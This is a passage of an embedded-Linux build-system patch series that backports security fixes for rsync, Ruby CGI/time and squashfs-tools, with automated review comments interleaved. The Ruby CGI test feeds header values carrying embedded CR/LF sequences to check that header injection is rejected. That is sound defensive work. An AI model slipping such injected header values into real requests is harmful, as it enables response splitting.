++ int filt_flags = S_ISDIR(file->mode) ? NAME_IS_DIR : NAME_IS_FILE;
++ if (check_filter(&daemon_filter_list, FLOG, fname, filt_flags) < 0) {
++ rprintf(FERROR, "ERROR: rejecting file transfer request for daemon excluded file: %s\n",
++ fname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
+ }
+
+ #ifdef SUPPORT_XATTRS
+--
+2.30.2
+
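Review bot: In the `recurse || xfer_dirs` block of `add_implied_include()`, `if (p[-1] != '/')` reads one byte before the freshly allocated `rule->pattern` when `arg_len` is 0, because the `else` branch skips the `memcpy` and leaves `p` at the start of the buffer. An empty `arg` looks reachable from the visible code when a non-relative source argument ends in `/`, since `arg = cp + 1` then points at the terminator. Guarding the test, `if (!arg_len || p[-1] != '/')`, keeps the result the same for non-empty input; as this is a backport, the change would best be raised upstream and carried here as a separate patch. Separately, the description line `CVE-2022-29154 rsync: remote arbitrary files write inside the` is cut off mid-sentence, and the tag is written `CVE:CVE-2022-29154` without the space used in the sibling patch (`CVE: CVE-2022-29154`).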
diff --git a/meta/recipes-devtools/rsync/rsync_3.1.3.bb b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
index 152ff02a25..c744503227 100644
--- a/meta/recipes-devtools/rsync/rsync_3.1.3.bb
+++ b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
@@ -1,5 +1,6 @@
SUMMARY = "File synchronization tool"
HOMEPAGE = "http://rsync.samba.org/"
+DESCRIPTION = "rsync is an open source utility that provides fast incremental file transfer."
BUGTRACKER = "http://rsync.samba.org/bugzilla.html"
SECTION = "console/network"
# GPLv2+ (<< 3.0.0), GPLv3+ (>= 3.0.0)
@@ -15,6 +16,8 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/src/${BP}.tar.gz \
file://CVE-2016-9841.patch \
file://CVE-2016-9842.patch \
file://CVE-2016-9843.patch \
+ file://CVE-2022-29154.patch \
+ file://0001-Fix-relative-when-copying-an-absolute-path.patch \
"
SRC_URI[md5sum] = "1581a588fde9d89f6bc6201e8129afaf"
diff --git a/meta/recipes-devtools/ruby/ruby.inc b/meta/recipes-devtools/ruby/ruby.inc
index a38b3fe624..a9f4240932 100644
--- a/meta/recipes-devtools/ruby/ruby.inc
+++ b/meta/recipes-devtools/ruby/ruby.inc
@@ -14,8 +14,8 @@ LIC_FILES_CHKSUM = "\
file://LEGAL;md5=2b6d62dc0d608f34d510ca3f428110ec \
"
-DEPENDS = "ruby-native zlib openssl tcl libyaml gdbm readline libffi"
-DEPENDS_class-native = "openssl-native libyaml-native readline-native zlib-native"
+DEPENDS = "zlib openssl libyaml gdbm readline libffi"
+DEPENDS_append_class-target = " ruby-native"
SHRT_VER = "${@oe.utils.trim_version("${PV}", 2)}"
SRC_URI = "http://cache.ruby-lang.org/pub/ruby/${SHRT_VER}/ruby-${PV}.tar.gz \
diff --git a/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch b/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch
new file mode 100644
index 0000000000..826daf2cda
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch
@@ -0,0 +1,32 @@
+From 2368d07660a93a2c41d63f3ab6054ca4daeef820 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 17 Nov 2020 18:31:40 +0000
+Subject: [PATCH] template/Makefile.in: do not write host cross-cc items into
+ target config
+
+This helps reproducibility.
+
+Upstream-Status: Inapproppriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ template/Makefile.in | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/template/Makefile.in b/template/Makefile.in
+index 10dc826..940ee07 100644
+--- a/template/Makefile.in
++++ b/template/Makefile.in
+@@ -657,11 +657,11 @@ mjit_config.h:
+ echo '#endif'; \
+ quote MJIT_MIN_HEADER_NAME "$(MJIT_MIN_HEADER_NAME)"; \
+ sep=,; \
+- quote "MJIT_CC_COMMON " $(MJIT_CC); \
++ quote "MJIT_CC_COMMON " ; \
+ quote "MJIT_CFLAGS MJIT_ARCHFLAG" $(MJIT_CFLAGS); \
+ quote "MJIT_OPTFLAGS " $(MJIT_OPTFLAGS); \
+ quote "MJIT_DEBUGFLAGS " $(MJIT_DEBUGFLAGS); \
+- quote "MJIT_LDSHARED " $(MJIT_LDSHARED); \
++ quote "MJIT_LDSHARED " ; \
+ quote "MJIT_DLDFLAGS MJIT_ARCHFLAG" $(MJIT_DLDFLAGS); \
+ quote "MJIT_LIBS " $(LIBRUBYARG_SHARED); \
+ quote 'PRELOADENV "@PRELOADENV@"'; \
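Review bot: The tag line reads `Upstream-Status: Inapproppriate [oe-core specific]`; the status keyword is misspelled and should be `Upstream-Status: Inappropriate [oe-core specific]`, otherwise tooling that parses patch status will presumably treat it as malformed. The description `This helps reproducibility.` also leaves out the functional side of the change: with `MJIT_CC_COMMON` and `MJIT_LDSHARED` written as empty, the generated `mjit_config.h` no longer names a compiler or linker, so it seems the JIT cannot work on the target without further configuration. A sentence saying that this is intended, and why the host cross-compiler path must not end up in the target config, would make the trade-off clear to whoever next rebases the patch.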
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch b/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
deleted file mode 100644
index 1abcb7547e..0000000000
--- a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 8946bb38b4d87549f0d99ed73c62c41933f97cc7 Mon Sep 17 00:00:00 2001
-From: Yusuke Endoh <mame@ruby-lang.org>
-Date: Tue, 29 Sep 2020 13:15:58 +0900
-Subject: [PATCH] Make it more strict to interpret some headers
-
-Some regexps were too tolerant.
-
-Upstream-Status: Backport
-[https://github.com/ruby/webrick/commit/8946bb38b4d87549f0d99ed73c62c41933f97cc7]
-CVE: CVE-2020-25613
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- lib/webrick/httprequest.rb | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/lib/webrick/httprequest.rb b/lib/webrick/httprequest.rb
-index 294bd91..d34eac7 100644
---- a/lib/webrick/httprequest.rb
-+++ b/lib/webrick/httprequest.rb
-@@ -227,9 +227,9 @@ def parse(socket=nil)
- raise HTTPStatus::BadRequest, "bad URI `#{@unparsed_uri}'."
- end
-
-- if /close/io =~ self["connection"]
-+ if /\Aclose\z/io =~ self["connection"]
- @keep_alive = false
-- elsif /keep-alive/io =~ self["connection"]
-+ elsif /\Akeep-alive\z/io =~ self["connection"]
- @keep_alive = true
- elsif @http_version < "1.1"
- @keep_alive = false
-@@ -508,7 +508,7 @@ def read_body(socket, block)
- return unless socket
- if tc = self['transfer-encoding']
- case tc
-- when /chunked/io then read_chunked(socket, block)
-+ when /\Achunked\z/io then read_chunked(socket, block)
- else raise HTTPStatus::NotImplemented, "Transfer-Encoding: #{tc}."
- end
- elsif self['content-length'] || @remaining_size
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
new file mode 100644
index 0000000000..cc2f9853db
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
@@ -0,0 +1,139 @@
+From 64c5045c0a6b84fdb938a8465a0890e5f7162708 Mon Sep 17 00:00:00 2001
+From: Yusuke Endoh <mame@ruby-lang.org>
+Date: Tue, 22 Nov 2022 10:49:27 +0900
+Subject: [PATCH] Prevent CRLF injection
+
+Throw a RuntimeError if the HTTP response header contains CR or LF to
+prevent HTTP response splitting.
+
+https://hackerone.com/reports/1204695
+
+Upstream-Status: Backport [https://github.com/ruby/cgi/commit/64c5045c0a6b84fdb938a8465a0890e5f7162708]
+CVE: CVE-2021-33621
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/cgi/core.rb | 45 +++++++++++++++++++++++--------------
+ test/cgi/test_cgi_header.rb | 8 +++++++
+ 2 files changed, 36 insertions(+), 17 deletions(-)
+
+diff --git a/lib/cgi/core.rb b/lib/cgi/core.rb
+index bec76e0..62e6068 100644
+--- a/lib/cgi/core.rb
++++ b/lib/cgi/core.rb
+@@ -188,17 +188,28 @@ class CGI
+ # Using #header with the HTML5 tag maker will create a <header> element.
+ alias :header :http_header
+
++ def _no_crlf_check(str)
++ if str
++ str = str.to_s
++ raise "A HTTP status or header field must not include CR and LF" if str =~ /[\r\n]/
++ str
++ else
++ nil
++ end
++ end
++ private :_no_crlf_check
++
+ def _header_for_string(content_type) #:nodoc:
+ buf = ''.dup
+ if nph?()
+- buf << "#{$CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'} 200 OK#{EOL}"
++ buf << "#{_no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'} 200 OK#{EOL}"
+ buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+- buf << "Server: #{$CGI_ENV['SERVER_SOFTWARE']}#{EOL}"
++ buf << "Server: #{_no_crlf_check($CGI_ENV['SERVER_SOFTWARE'])}#{EOL}"
+ buf << "Connection: close#{EOL}"
+ end
+- buf << "Content-Type: #{content_type}#{EOL}"
++ buf << "Content-Type: #{_no_crlf_check(content_type)}#{EOL}"
+ if @output_cookies
+- @output_cookies.each {|cookie| buf << "Set-Cookie: #{cookie}#{EOL}" }
++ @output_cookies.each {|cookie| buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}" }
+ end
+ return buf
+ end # _header_for_string
+@@ -213,9 +224,9 @@ class CGI
+ ## NPH
+ options.delete('nph') if defined?(MOD_RUBY)
+ if options.delete('nph') || nph?()
+- protocol = $CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'
++ protocol = _no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'
+ status = options.delete('status')
+- status = HTTP_STATUS[status] || status || '200 OK'
++ status = HTTP_STATUS[status] || _no_crlf_check(status) || '200 OK'
+ buf << "#{protocol} #{status}#{EOL}"
+ buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+ options['server'] ||= $CGI_ENV['SERVER_SOFTWARE'] || ''
+@@ -223,38 +234,38 @@ class CGI
+ end
+ ## common headers
+ status = options.delete('status')
+- buf << "Status: #{HTTP_STATUS[status] || status}#{EOL}" if status
++ buf << "Status: #{HTTP_STATUS[status] || _no_crlf_check(status)}#{EOL}" if status
+ server = options.delete('server')
+- buf << "Server: #{server}#{EOL}" if server
++ buf << "Server: #{_no_crlf_check(server)}#{EOL}" if server
+ connection = options.delete('connection')
+- buf << "Connection: #{connection}#{EOL}" if connection
++ buf << "Connection: #{_no_crlf_check(connection)}#{EOL}" if connection
+ type = options.delete('type')
+- buf << "Content-Type: #{type}#{EOL}" #if type
++ buf << "Content-Type: #{_no_crlf_check(type)}#{EOL}" #if type
+ length = options.delete('length')
+- buf << "Content-Length: #{length}#{EOL}" if length
++ buf << "Content-Length: #{_no_crlf_check(length)}#{EOL}" if length
+ language = options.delete('language')
+- buf << "Content-Language: #{language}#{EOL}" if language
++ buf << "Content-Language: #{_no_crlf_check(language)}#{EOL}" if language
+ expires = options.delete('expires')
+ buf << "Expires: #{CGI.rfc1123_date(expires)}#{EOL}" if expires
+ ## cookie
+ if cookie = options.delete('cookie')
+ case cookie
+ when String, Cookie
+- buf << "Set-Cookie: #{cookie}#{EOL}"
++ buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}"
+ when Array
+ arr = cookie
+- arr.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ arr.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ when Hash
+ hash = cookie
+- hash.each_value {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ hash.each_value {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ end
+ end
+ if @output_cookies
+- @output_cookies.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ @output_cookies.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ end
+ ## other headers
+ options.each do |key, value|
+- buf << "#{key}: #{value}#{EOL}"
++ buf << "#{_no_crlf_check(key)}: #{_no_crlf_check(value)}#{EOL}"
+ end
+ return buf
+ end # _header_for_hash
+diff --git a/test/cgi/test_cgi_header.rb b/test/cgi/test_cgi_header.rb
+index bab2d03..ec2f4de 100644
+--- a/test/cgi/test_cgi_header.rb
++++ b/test/cgi/test_cgi_header.rb
+@@ -176,6 +176,14 @@ class CGIHeaderTest < Test::Unit::TestCase
+ end
+
+
++ def test_cgi_http_header_crlf_injection
++ cgi = CGI.new
++ assert_raise(RuntimeError) { cgi.http_header("text/xhtml\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("type" => "text/xhtml\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("status" => "200 OK\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("location" => "text/xhtml\r\nBOO") }
++ end
++
+
+ instance_methods.each do |method|
+ private method if method =~ /^test_(.*)/ && $1 != ENV['TEST']
+--
+2.25.1
+
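Review bot: `test_cgi_http_header_crlf_injection` exercises the content-type string, `type`, `status` and one free-form header, but none of the `Set-Cookie` paths or the NPH branch that the patch also wraps in `_no_crlf_check`. A follow-up assertion such as `assert_raise(RuntimeError) { cgi.http_header("cookie" => "a=b\r\nBOO") }` would pin the String cookie case, so a later rebase that drops one of those wrappers is caught by ptest. The message `A HTTP status or header field must not include CR and LF` is also slightly off, since the check `str =~ /[\r\n]/` rejects either character on its own; "CR or LF" would match the behaviour. Both points are best sent upstream, so that the backport stays identical to the referenced commit.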
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
new file mode 100644
index 0000000000..c25a147d36
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
@@ -0,0 +1,61 @@
+From 957bb7cb81995f26c671afce0ee50a5c660e540e Mon Sep 17 00:00:00 2001
+From: Hiroshi SHIBATA <hsbt@ruby-lang.org>
+Date: Wed, 29 Mar 2023 13:28:25 +0900
+Subject: [PATCH] CVE-2023-28756
+
+CVE: CVE-2023-28756
+Upstream-Status: Backport [https://github.com/ruby/ruby/commit/957bb7cb81995f26c671afce0ee50a5c660e540e]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/time.rb | 6 +++---
+ test/test_time.rb | 9 +++++++++
+ 2 files changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/time.rb b/lib/time.rb
+index f27bacd..4a86e8e 100644
+--- a/lib/time.rb
++++ b/lib/time.rb
+@@ -501,8 +501,8 @@ class Time
+ (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+
+ (\d{2,})\s+
+ (\d{2})\s*
+- :\s*(\d{2})\s*
+- (?::\s*(\d{2}))?\s+
++ :\s*(\d{2})
++ (?:\s*:\s*(\d\d))?\s+
+ ([+-]\d{4}|
+ UT|GMT|EST|EDT|CST|CDT|MST|MDT|PST|PDT|[A-IK-Z])/ix =~ date
+ # Since RFC 2822 permit comments, the regexp has no right anchor.
+@@ -717,7 +717,7 @@ class Time
+ #
+ # If self is a UTC time, Z is used as TZD. [+-]hh:mm is used otherwise.
+ #
+- # +fractional_digits+ specifies a number of digits to use for fractional
++ # +fraction_digits+ specifies a number of digits to use for fractional
+ # seconds. Its default value is 0.
+ #
+ # require 'time'
+diff --git a/test/test_time.rb b/test/test_time.rb
+index ca20788..4f11048 100644
+--- a/test/test_time.rb
++++ b/test/test_time.rb
+@@ -62,6 +62,15 @@ class TestTimeExtension < Test::Unit::TestCase # :nodoc:
+ assert_equal(true, t.utc?)
+ end
+
++ def test_rfc2822_nonlinear
++ pre = ->(n) {"0 Feb 00 00 :00" + " " * n}
++ assert_linear_performance([100, 500, 5000, 50_000], pre: pre) do |s|
++ assert_raise(ArgumentError) do
++ Time.rfc2822(s)
++ end
++ end
++ end
++
+ def test_encode_rfc2822
+ t = Time.utc(1)
+ assert_equal("Mon, 01 Jan 0001 00:00:00 -0000", t.rfc2822)
+--
+2.25.1
+
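Review bot: `test_rfc2822_nonlinear` calls `assert_linear_performance`, which this patch does not add; whether the test helpers shipped with the 2.7.6 tarball define it cannot be seen from here, and if they do not, the new test would fail with a NoMethodError under ptest instead of checking the fix. It is worth confirming this by running the ruby ptest, or dropping the `test/test_time.rb` part of the backport. The commit message is also only `CVE-2023-28756`; a line such as `Fix quadratic backtracking in the Time.rfc2822 regexp: the optional seconds group no longer competes with the preceding \s* for the same whitespace.` would tell a reader what the two changed regexp lines do. The `fractional_digits` to `fraction_digits` comment change in the second `lib/time.rb` hunk is unrelated to the CVE and should be mentioned as such.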
diff --git a/meta/recipes-devtools/ruby/ruby_2.7.1.bb b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
index f87686f6f7..7e6373bd24 100644
--- a/meta/recipes-devtools/ruby/ruby_2.7.1.bb
+++ b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
@@ -6,11 +6,17 @@ SRC_URI += " \
file://remove_has_include_macros.patch \
file://run-ptest \
file://0001-Modify-shebang-of-libexec-y2racc-and-libexec-racc2y.patch \
- file://CVE-2020-25613.patch \
+ file://0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch \
+ file://CVE-2023-28756.patch \
+ file://CVE-2021-33621.patch \
"
-SRC_URI[md5sum] = "debb9c325bf65021214451660f46e909"
-SRC_URI[sha256sum] = "d418483bdd0000576c1370571121a6eb24582116db0b7bb2005e90e250eae418"
+SRC_URI[md5sum] = "f972fb0cce662966bec10d5c5f32d042"
+SRC_URI[sha256sum] = "e7203b0cc09442ed2c08936d483f8ac140ec1c72e37bb5c401646b7866cb5d10"
+
+# CVE-2021-28966 is Windows specific and not affects Linux OS
+# https://security-tracker.debian.org/tracker/CVE-2021-28966
+CVE_CHECK_WHITELIST += "CVE-2021-28966"
PACKAGECONFIG ??= ""
PACKAGECONFIG += "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
index f84a7e18c8..95dccb9cae 100755
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
@@ -72,12 +72,12 @@ exec_postinst_scriptlets() {
else
echo "ERROR: postinst $i failed."
[ "$POSTINST_LOGGING" = "1" ] && eval echo "ERROR: postinst $i failed." $append_log
- remove_pi_dir=0
+ remove_rcsd_link=0
fi
done
}
-remove_pi_dir=1
+remove_rcsd_link=1
if $pm_installed; then
case $pm in
"ipk")
@@ -92,9 +92,7 @@ else
exec_postinst_scriptlets
fi
-# since all postinstalls executed successfully, remove the postinstalls directory
-# and the rcS.d link
-if [ $remove_pi_dir = 1 ]; then
- rm -rf $pi_dir
+# since all postinstalls executed successfully, remove the rcS.d link
+if [ $remove_rcsd_link = 1 ]; then
remove_rcsd_link
fi
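Review bot: The flag is now named `remove_rcsd_link`, the same as the function called one line below the test, so `[ $remove_rcsd_link = 1 ]` and the call `remove_rcsd_link` read as the same thing although one is a variable and the other a function. Shell keeps the two namespaces apart, so this works, but a distinct flag name such as `all_postinsts_ok` (also at the assignments `remove_rcsd_link=0` and `remove_rcsd_link=1` in the previous hunk) would be easier to follow. The expansion in the test is unquoted; `if [ "$remove_rcsd_link" = 1 ]; then` avoids a syntax error from `[` should the variable ever be empty. With `rm -rf $pi_dir` removed, a comment stating where the postinst scripts are now deleted, or that they are kept on purpose, would help; that part of the script is outside the hunk.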
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
index 7f72f3388a..b6b81d5c1a 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
@@ -1,7 +1,7 @@
[Unit]
Description=Run pending postinsts
DefaultDependencies=no
-After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount
+After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount ldconfig.service
Before=sysinit.target
[Service]
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
index 85b3fc867e..c353d4b79c 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
@@ -1,4 +1,5 @@
SUMMARY = "Runs postinstall scripts on first boot of the target device"
+DESCRIPTION = "${SUMMARY}"
SECTION = "devel"
PR = "r10"
LICENSE = "MIT"
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
new file mode 100644
index 0000000000..95e2534ee4
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
@@ -0,0 +1,253 @@
+Backport patch to fix CVE-2021-40153, and remove version update in unsquashfs.c
+for compatible.
+
+Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55]
+CVE: CVE-2021-40153
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001
+From: Phillip Lougher <phillip@squashfs.org.uk>
+Date: Sat, 16 Jan 2021 20:08:55 +0000
+Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit
+
+An issue on Github (https://github.com/plougher/squashfs-tools/issues/72)
+shows how some specially crafted Squashfs filesystems containing
+invalid file names (with '/' and ..) can cause Unsquashfs to write
+files outside of the destination directory.
+
+This commit fixes this exploit by checking all names for
+validity.
+
+In doing so I have also added checks for '.' and for names that
+are shorter than they should be (names in the file system should
+not have '\0' terminators).
+
+Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
+---
+ squashfs-tools/Makefile | 5 ++-
+ squashfs-tools/unsquash-1.c | 9 +++++-
+ squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++
+ squashfs-tools/unsquash-2.c | 9 +++++-
+ squashfs-tools/unsquash-3.c | 9 +++++-
+ squashfs-tools/unsquash-4.c | 9 +++++-
+ squashfs-tools/unsquashfs.h | 5 ++-
+ 7 files changed, 98 insertions(+), 6 deletions(-)
+ create mode 100644 squashfs-tools/unsquash-1234.c
+
+diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile
+index aee4b960..20feaca2 100644
+--- a/squashfs-tools/Makefile
++++ b/squashfs-tools/Makefile
+@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \
+ caches-queues-lists.o
+
+ UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \
+- unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o
++ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \
++ compressor.o unsquashfs_info.o
+
+ CFLAGS ?= -O2
+ CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \
+@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h
+
+ unsquash-34.o: unsquashfs.h unsquash-34.c
+
++unsquash-1234.o: unsquash-1234.c
++
+ unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h
+
+ unsquashfs_info.o: unsquashfs.h squashfs_fs.h
+diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
+index 34eced36..28326cb1 100644
+--- a/squashfs-tools/unsquash-1.c
++++ b/squashfs-tools/unsquash-1.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
+new file mode 100644
+index 00000000..c2d4f42b
+--- /dev/null
++++ b/squashfs-tools/unsquash-1234.c
+@@ -0,0 +1,58 @@
++/*
++ * Unsquash a squashfs filesystem. This is a highly compressed read only
++ * filesystem.
++ *
++ * Copyright (c) 2021
++ * Phillip Lougher <phillip@squashfs.org.uk>
++ *
++ * This program is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU General Public License
++ * as published by the Free Software Foundation; either version 2,
++ * or (at your option) any later version.
++ *
++ * This program is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with this program; if not, write to the Free Software
++ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
++ *
++ * unsquash-1234.c
++ *
++ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and
++ * unsquash-4.
++ */
++
++#define TRUE 1
++#define FALSE 0
++/*
++ * Check name for validity, name should not
++ * - be ".", "./", or
++ * - be "..", "../" or
++ * - have a "/" anywhere in the name, or
++ * - be shorter than the expected size
++ */
++int check_name(char *name, int size)
++{
++ char *start = name;
++
++ if(name[0] == '.') {
++ if(name[1] == '.')
++ name++;
++ if(name[1] == '/' || name[1] == '\0')
++ return FALSE;
++ }
++
++ while(name[0] != '/' && name[0] != '\0')
++ name ++;
++
++ if(name[0] == '/')
++ return FALSE;
++
++ if((name - start) != size)
++ return FALSE;
++
++ return TRUE;
++}
+diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
+index 4b3d767e..474064e1 100644
+--- a/squashfs-tools/unsquash-2.c
++++ b/squashfs-tools/unsquash-2.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2013, 2019
++ * Copyright (c) 2009, 2010, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
+index 02c31fc5..65cfe4d9 100644
+--- a/squashfs-tools/unsquash-3.c
++++ b/squashfs-tools/unsquash-3.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
+index 8475835c..aa23a841 100644
+--- a/squashfs-tools/unsquash-4.c
++++ b/squashfs-tools/unsquash-4.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
